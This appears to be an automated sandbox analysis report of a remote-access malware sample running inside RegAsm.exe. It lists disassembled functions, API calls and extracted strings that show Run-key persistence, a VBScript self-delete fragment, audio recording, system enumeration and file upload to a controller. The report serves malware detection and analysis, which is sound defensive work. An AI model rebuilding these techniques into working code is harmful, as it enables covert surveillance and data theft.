                                                        • String ID: """, 0$")$8SG$@qF$@qF$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                                        • API String ID: 1861856835-1447701601
                                                        • Opcode ID: 794eba10b69094c6990f25edb43bc5f181c5c90267341265794d1b1851e37820
                                                        • Instruction ID: 9f807323933333198641953f201c1fc8368d74e19fdabe041c5449f7db564f80
                                                        • Opcode Fuzzy Hash: 794eba10b69094c6990f25edb43bc5f181c5c90267341265794d1b1851e37820
                                                        • Instruction Fuzzy Hash: 8791B0716082005AC315FB62D8529AF77A8AFD4309F10443FB64AA71E3EF7C9D49C65E
                                                        Function 0040D0D1 Relevance: 42.3, APIs: 6, Strings: 18, Instructions: 260registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,?,0040D84A), ref: 0041289B
                                                          • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF,?,0040D84A), ref: 004128AE
                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1E0
                                                        • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D1F3
                                                        • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D223
                                                        • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D232
                                                          • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2B8,00000000,00000000,?,0040D47D,?,00000000), ref: 0040B8F6
                                                          • Part of subcall function 0040B8E7: UnhookWindowsHookEx.USER32 ref: 0040B902
                                                          • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2A2,00000000,?,0040D47D,?,00000000), ref: 0040B910
                                                          • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040407C), ref: 0041BA30
                                                        • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D44D
                                                        • ExitProcess.KERNEL32 ref: 0040D454
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                        • String ID: ")$.vbs$8SG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("$xpF
                                                        • API String ID: 3797177996-2483056239
                                                        • Opcode ID: ec03f19f21437d373cc1d96c9dd98b1915d83cb06e604dc6ef52706e93ab3566
                                                        • Instruction ID: f7f00373e35faeae073ffedb9d5543756e5675edee5c5b567d0d61755fae189b
                                                        • Opcode Fuzzy Hash: ec03f19f21437d373cc1d96c9dd98b1915d83cb06e604dc6ef52706e93ab3566
                                                        • Instruction Fuzzy Hash: 6181AF716082405AC315FB62D8529AF77A8AFD0308F10483FB58A671E3EF7C9E49C65E
                                                        Function 004124B0 Relevance: 40.4, APIs: 17, Strings: 6, Instructions: 190synchronizationsleepfileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,004750E4,00000003), ref: 004124CF
                                                        • ExitProcess.KERNEL32(00000000), ref: 004124DB
                                                        • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00412555
                                                        • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412564
                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0041256F
                                                        • CloseHandle.KERNEL32(00000000), ref: 00412576
                                                        • GetCurrentProcessId.KERNEL32 ref: 0041257C
                                                        • PathFileExistsW.SHLWAPI(?), ref: 004125AD
                                                        • GetTempPathW.KERNEL32(00000104,?), ref: 00412610
                                                        • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 0041262A
                                                        • lstrcatW.KERNEL32 ref: 0041263C
                                                          • Part of subcall function 0041C482: CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041C4C1
                                                        • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 0041267C
                                                        • Sleep.KERNEL32(000001F4), ref: 004126BD
                                                        • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 004126D2
                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004126DD
                                                        • CloseHandle.KERNEL32(00000000), ref: 004126E4
                                                        • GetCurrentProcessId.KERNEL32 ref: 004126EA
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
                                                        • String ID: .exe$8SG$WDH$exepath$open$temp_
                                                        • API String ID: 2649220323-436679193
                                                        • Opcode ID: ad55fade47a44d5a96cc11b86df2472168e9c7caf5a37438c9269d8872241baf
                                                        • Instruction ID: ea0e71dbd1735df2f0ffa6a76a18ae54bfb239dee3d1740714ca762960b89f4c
                                                        • Opcode Fuzzy Hash: ad55fade47a44d5a96cc11b86df2472168e9c7caf5a37438c9269d8872241baf
                                                        • Instruction Fuzzy Hash: 4C51C871A00215BBDB10ABA09C99EFE336D9B04715F1041ABF501E71D2EF7C8E858A5D
                                                        Function 0041B0D8 Relevance: 40.4, APIs: 12, Strings: 11, Instructions: 180synchronizationCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041B1CD
                                                        • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041B1E1
                                                        • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,004660B4), ref: 0041B209
                                                        • PathFileExistsW.SHLWAPI(00000000), ref: 0041B21F
                                                        • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041B260
                                                        • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041B278
                                                        • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041B28D
                                                        • SetEvent.KERNEL32 ref: 0041B2AA
                                                        • WaitForSingleObject.KERNEL32(000001F4), ref: 0041B2BB
                                                        • CloseHandle.KERNEL32 ref: 0041B2CB
                                                        • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041B2ED
                                                        • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041B2F7
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                                        • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$NG
                                                        • API String ID: 738084811-2094122233
                                                        • Opcode ID: d561e535e20e94d4d32498695f90d41e23c390ecef7d03d0c81b33d87c062984
                                                        • Instruction ID: 904a2ea9ee052b7cd0d2885f28b370526ea16529c5f4723dacad6ab52bd59ce6
                                                        • Opcode Fuzzy Hash: d561e535e20e94d4d32498695f90d41e23c390ecef7d03d0c81b33d87c062984
                                                        • Instruction Fuzzy Hash: 015193B12842056ED314B731DC96ABF779CDB80359F10053FB246621E2EF789D498AAE
                                                        Function 00401A6D Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 156fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                                        • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401B03
                                                        • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401B13
                                                        • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401B23
                                                        • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401B33
                                                        • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401B43
                                                        • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B54
                                                        • WriteFile.KERNEL32(00000000,00472AAA,00000002,00000000,00000000), ref: 00401B65
                                                        • WriteFile.KERNEL32(00000000,00472AAC,00000004,00000000,00000000), ref: 00401B75
                                                        • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401B85
                                                        • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B96
                                                        • WriteFile.KERNEL32(00000000,00472AB6,00000002,00000000,00000000), ref: 00401BA7
                                                        • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401BB7
                                                        • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401BC7
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: File$Write$Create
                                                        • String ID: RIFF$WAVE$data$fmt
                                                        • API String ID: 1602526932-4212202414
                                                        • Opcode ID: bdde9fe629d6d0b3cb01441b1d036ed99aff71c5e0b2c5a0236a53ffdd76988e
                                                        • Instruction ID: e437df56db769974f3bb03b9acf3047b6271bea3308615ff466a61b001f8e6b8
                                                        • Opcode Fuzzy Hash: bdde9fe629d6d0b3cb01441b1d036ed99aff71c5e0b2c5a0236a53ffdd76988e
                                                        • Instruction Fuzzy Hash: D1413F72644218BAE210DB51DD85FBB7FECEB89B50F40441AFA44D60C0E7A5E909DBB3
                                                        Function 004072AB Relevance: 35.1, APIs: 12, Strings: 8, Instructions: 62libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000001,00407688,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000003,004076B0,004752D8,00407709), ref: 004072BF
                                                        • GetProcAddress.KERNEL32(00000000), ref: 004072C8
                                                        • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 004072DD
                                                        • GetProcAddress.KERNEL32(00000000), ref: 004072E0
                                                        • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 004072F1
                                                        • GetProcAddress.KERNEL32(00000000), ref: 004072F4
                                                        • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 00407305
                                                        • GetProcAddress.KERNEL32(00000000), ref: 00407308
                                                        • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 00407319
                                                        • GetProcAddress.KERNEL32(00000000), ref: 0040731C
                                                        • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 0040732D
                                                        • GetProcAddress.KERNEL32(00000000), ref: 00407330
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AddressHandleModuleProc
                                                        • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                                        • API String ID: 1646373207-255920310
                                                        • Opcode ID: f3da3711bb85931ca03a42678d4c0c1881451176f862cc8ba737a85fa656c6e8
                                                        • Instruction ID: 405170eedd050388d8f538cead316ce70cca9a1d875d15a5a69166cce564cbe9
                                                        • Opcode Fuzzy Hash: f3da3711bb85931ca03a42678d4c0c1881451176f862cc8ba737a85fa656c6e8
                                                        • Instruction Fuzzy Hash: 0A0152A0E4431676D711AF7AAC44D577E9D9E41351311487BB405E2292EEBCE800CD6E
                                                        Function 0040CE34 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 203fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _wcslen.LIBCMT ref: 0040CE42
                                                        • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040CE5B
                                                        • CopyFileW.KERNEL32 ref: 0040CF0B
                                                        • _wcslen.LIBCMT ref: 0040CF21
                                                        • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040CFA9
                                                        • CopyFileW.KERNEL32 ref: 0040CFBF
                                                        • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFFE
                                                        • _wcslen.LIBCMT ref: 0040D001
                                                        • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040D018
                                                        • CloseHandle.KERNEL32 ref: 0040D068
                                                        • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000001), ref: 0040D086
                                                        • ExitProcess.KERNEL32 ref: 0040D09D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                                                        • String ID: 6$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$del$open
                                                        • API String ID: 1579085052-2309681474
                                                        • Opcode ID: cf3ade877b167e70c46e53b810f9fed9df6f55308ddf96a6d8fe48dcf536bada
                                                        • Instruction ID: 98553dc1b0994f0aa09194d7cf3a18af63584d9ff732256a229fdfb73b573f5c
                                                        • Opcode Fuzzy Hash: cf3ade877b167e70c46e53b810f9fed9df6f55308ddf96a6d8fe48dcf536bada
                                                        • Instruction Fuzzy Hash: 3151E820208302ABD615B7359C92A6F679D9F8471DF00443FF60AA61E3EF7C9D05866E
                                                        Function 0041C0AC Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 139stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • lstrlenW.KERNEL32(?), ref: 0041C0C7
                                                        • _memcmp.LIBVCRUNTIME ref: 0041C0DF
                                                        • lstrlenW.KERNEL32(?), ref: 0041C0F8
                                                        • FindFirstVolumeW.KERNEL32 ref: 0041C133
                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041C146
                                                        • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041C18A
                                                        • lstrcmpW.KERNEL32(?,?), ref: 0041C1A5
                                                        • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041C1BD
                                                        • _wcslen.LIBCMT ref: 0041C1CC
                                                        • FindVolumeClose.KERNEL32 ref: 0041C1EC
                                                        • GetLastError.KERNEL32 ref: 0041C204
                                                        • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041C231
                                                        • lstrcatW.KERNEL32 ref: 0041C24A
                                                        • lstrcpyW.KERNEL32(?,?), ref: 0041C259
                                                        • GetLastError.KERNEL32 ref: 0041C261
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                                        • String ID: ?
                                                        • API String ID: 3941738427-1684325040
                                                        • Opcode ID: a0ce836f87bdb73d1aed96e44626d16fc1f948222461cff8e144d7328d36a715
                                                        • Instruction ID: 8d48ee17a24f37a9bc83e71ffc922dd471ae74eb47091415c6e266b1ff6a60c4
                                                        • Opcode Fuzzy Hash: a0ce836f87bdb73d1aed96e44626d16fc1f948222461cff8e144d7328d36a715
                                                        • Instruction Fuzzy Hash: B541A671584316EBD720DFA0DC889DBB7ECEB84745F00092BF545D2162EB78CA88CB96
                                                        Function 00414DC1 Relevance: 26.4, APIs: 9, Strings: 6, Instructions: 109libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414E10
                                                        • LoadLibraryA.KERNEL32(?), ref: 00414E52
                                                        • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E72
                                                        • FreeLibrary.KERNEL32(00000000), ref: 00414E79
                                                        • LoadLibraryA.KERNEL32(?), ref: 00414EB1
                                                        • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414EC3
                                                        • FreeLibrary.KERNEL32(00000000), ref: 00414ECA
                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00414ED9
                                                        • FreeLibrary.KERNEL32(00000000), ref: 00414EF0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                                        • String ID: EIA$\ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                                                        • API String ID: 2490988753-3346362794
                                                        • Opcode ID: bff3b13f7ac9eea3f878ccf145141800db562e87b1258dd51974eed62fb821cf
                                                        • Instruction ID: 3d65f6a93fba2a0b2eac8854c7d2b2934d6e6a161d7d6dc9994b6ec54a408268
                                                        • Opcode Fuzzy Hash: bff3b13f7ac9eea3f878ccf145141800db562e87b1258dd51974eed62fb821cf
                                                        • Instruction Fuzzy Hash: 5E31C4B1905315A7D7209F65CC84DDF76DCAB84754F004A2AF944A3210D738D985CBAE
                                                        Function 00412AEF Relevance: 25.0, APIs: 9, Strings: 5, Instructions: 482sleepfileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00412B08
                                                          • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040407C), ref: 0041BA30
                                                          • Part of subcall function 004185A3: CloseHandle.KERNEL32(004040F5), ref: 004185B9
                                                          • Part of subcall function 004185A3: CloseHandle.KERNEL32(00465E84), ref: 004185C2
                                                        • Sleep.KERNEL32(0000000A,00465E84), ref: 00412C5A
                                                        • Sleep.KERNEL32(0000000A,00465E84,00465E84), ref: 00412CFC
                                                        • Sleep.KERNEL32(0000000A,00465E84,00465E84,00465E84), ref: 00412D9E
                                                        • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E00
                                                        • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E37
                                                        • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E73
                                                        • Sleep.KERNEL32(000001F4,00465E84,00465E84,00465E84), ref: 00412E8D
                                                        • Sleep.KERNEL32(00000064), ref: 00412ECF
                                                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                                        • String ID: /stext "$0TG$0TG$NG$NG
                                                        • API String ID: 1223786279-2576077980
                                                        • Opcode ID: 8b5758fc960045b70db6b1621d1f1f5248a15739f774e2f35fdd395e03aad00d
                                                        • Instruction ID: 10d3359c81a21c2239512d2238f4034584c87ebec4848cfd83014516dee20f06
                                                        • Opcode Fuzzy Hash: 8b5758fc960045b70db6b1621d1f1f5248a15739f774e2f35fdd395e03aad00d
                                                        • Instruction Fuzzy Hash: 2F0268315083414AC325FB62D891AEFB3E5AFD4348F50483FF58A931E2EF785A49C65A
                                                        Function 0044F4AD Relevance: 24.4, APIs: 16, Instructions: 419COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: _free$EnvironmentVariable
                                                        • String ID:
                                                        • API String ID: 1464849758-0
                                                        • Opcode ID: a471c829ddd5e79256b59335d7b350d61db07916532beff835d4a4e17985a3d6
                                                        • Instruction ID: 2409d22e097b45b84bdb59948eb4ebc1cd1141af37d2d18b4001dba56dac1aed
                                                        • Opcode Fuzzy Hash: a471c829ddd5e79256b59335d7b350d61db07916532beff835d4a4e17985a3d6
                                                        • Instruction Fuzzy Hash: E3D135B1D003006FFB24AF799D82A6B7BA8EF01314F05417FE945A7382EB7D99098759
                                                        Function 0041C720 Relevance: 23.0, APIs: 6, Strings: 7, Instructions: 214registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041C742
                                                        • RegEnumKeyExA.ADVAPI32 ref: 0041C786
                                                        • RegCloseKey.ADVAPI32(?), ref: 0041CA50
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CloseEnumOpen
                                                        • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                                        • API String ID: 1332880857-3714951968
                                                        • Opcode ID: f13192da4e66231cc3a913cdaba6528dc2f099d68fe13da123ac92ab36a9ee38
                                                        • Instruction ID: 8204223968f620e226549da85b9b34a309c849e8d9bbed411749b7727356edba
                                                        • Opcode Fuzzy Hash: f13192da4e66231cc3a913cdaba6528dc2f099d68fe13da123ac92ab36a9ee38
                                                        • Instruction Fuzzy Hash: 3E8133311082459BC325EF11D851EEFB7E8BF94309F10492FB589921A2FF74AE49CA5A
                                                        Function 0041D620 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 74windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041D66B
                                                        • GetCursorPos.USER32(?), ref: 0041D67A
                                                        • SetForegroundWindow.USER32(?), ref: 0041D683
                                                        • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041D69D
                                                        • Shell_NotifyIconA.SHELL32(00000002,00474B48), ref: 0041D6EE
                                                        • ExitProcess.KERNEL32 ref: 0041D6F6
                                                        • CreatePopupMenu.USER32 ref: 0041D6FC
                                                        • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041D711
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                                        • String ID: Close
                                                        • API String ID: 1657328048-3535843008
                                                        • Opcode ID: 2cdbc08d807d068952302bab703dbbbb7de86244cd36d8f377370d21a5bc842f
                                                        • Instruction ID: ffebe08b42ddc2cad69fc5dc181b4667ce265f065f51bc56e4a7814a85689449
                                                        • Opcode Fuzzy Hash: 2cdbc08d807d068952302bab703dbbbb7de86244cd36d8f377370d21a5bc842f
                                                        • Instruction Fuzzy Hash: 2D213BB1544209FFDF155FA4ED0EAAA3F35EB08302F000125F909951B2D779EDA1EB19
                                                        Function 00445DD7 Relevance: 22.8, APIs: 15, Instructions: 296COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: _free$Info
                                                        • String ID:
                                                        • API String ID: 2509303402-0
                                                        • Opcode ID: 265d55c29888f35ec20f5081f159e7cd252a50d65c59893da787bb4e51b2451e
                                                        • Instruction ID: 03d8b0dccc9171d7b4ee81f85837dfa1205ba0d7832ce976ccf3d084d520ac26
                                                        • Opcode Fuzzy Hash: 265d55c29888f35ec20f5081f159e7cd252a50d65c59893da787bb4e51b2451e
                                                        • Instruction Fuzzy Hash: AFB1CE719002059FEB21DF69C881BEEBBF4BF09304F15842EF495A7242DB79AC458B69
                                                        Function 00408BB5 Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 328fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00408D1E
                                                        • GetFileSizeEx.KERNEL32(00000000,?), ref: 00408D56
                                                        • __aulldiv.LIBCMT ref: 00408D88
                                                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                          • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                        • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00408EAB
                                                        • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408EC6
                                                        • CloseHandle.KERNEL32(00000000), ref: 00408F9F
                                                        • CloseHandle.KERNEL32(00000000), ref: 00408FE9
                                                        • CloseHandle.KERNEL32(00000000), ref: 00409037
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
                                                        • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $NG
                                                        • API String ID: 3086580692-2582957567
                                                        • Opcode ID: 2a6cbd74b7f1d7262aabe967babe0c7563b8d160d0352d0a7d413315700012c3
                                                        • Instruction ID: 3fce176daff91a8ac67d7e00268aa6ddaa8eb0a69c3dc15cdf5b3728eb075172
                                                        • Opcode Fuzzy Hash: 2a6cbd74b7f1d7262aabe967babe0c7563b8d160d0352d0a7d413315700012c3
                                                        • Instruction Fuzzy Hash: CCB1A1316083409BC314FB26C941AAFB7E5AFC4358F40492FF589622D2EF789945CB8B
                                                        Function 0040A761 Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 163sleepCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • Sleep.KERNEL32(00001388), ref: 0040A77B
                                                          • Part of subcall function 0040A6B0: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0040A6E6
                                                          • Part of subcall function 0040A6B0: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A788), ref: 0040A6F5
                                                          • Part of subcall function 0040A6B0: Sleep.KERNEL32(00002710,?,?,?,0040A788), ref: 0040A722
                                                          • Part of subcall function 0040A6B0: CloseHandle.KERNEL32(00000000), ref: 0040A729
                                                        • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040A7B7
                                                        • GetFileAttributesW.KERNEL32(00000000), ref: 0040A7C8
